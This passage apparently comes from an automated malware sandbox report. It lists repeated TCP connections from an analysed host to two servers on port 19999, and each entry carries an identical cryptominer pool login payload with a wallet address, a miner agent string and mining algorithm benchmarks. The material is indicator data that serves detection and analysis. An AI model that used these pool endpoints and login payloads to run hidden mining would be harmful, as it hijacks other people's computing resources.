221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49756 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49757 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49758 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49759 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49760 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49761 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49762 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49763 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49764 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49765 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49766 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49767 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49768 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49769 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49770 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49771 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx/sfx":0.0019122618738827782,"rx/keva":0.0,"panthera":0.5784120111385628,"argon2/chukwa":0.0,"argon2/chukwav2":0.03208308825418695,"argon2/ninja":0.0,"ghostrider":5.25236477997617}}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49772 -> 5.75.158.61:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44vgf35jdhyneypxgzhhmriv7asfkbwuxhuq4udoxauaqw8zzy9g9zbqiwwexyqu3ek9nkw3wwgwpj4vmvuh2lnnazj8xms","pass":"x","agent":"verykuai/2.1.7.5 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"],"algo-perf":{"cn/1":0.025271635366403998,"cn/2":0.025271635366403998,"cn/r":0.025271635366403998,"cn/fast":0.050543270732807996,"cn/half":0.050543270732807996,"cn/xao":0.025271635366403998,"cn/rto":0.025271635366403998,"cn/rwz":0.033695513821872,"cn/zls":0.033695513821872,"cn/double":0.012635817683201999,"cn/ccx":200.0210437710438,"cn-lite/1":0.2700116288153191,"cn-heavy/0":0.0,"cn-heavy/tube":0.0,"cn-heavy/xhv":85.89211618257261,"cn-pico":0.07388631312991728,"cn-pico/tlo":0.07388631312991728,"cn/upx2":0.0,"rx/0":0.0019122618738827782,"rx/wow":0.0,"rx/arq":0.0038245885254968243,"rx/graft":0.00010634527625221259,"rx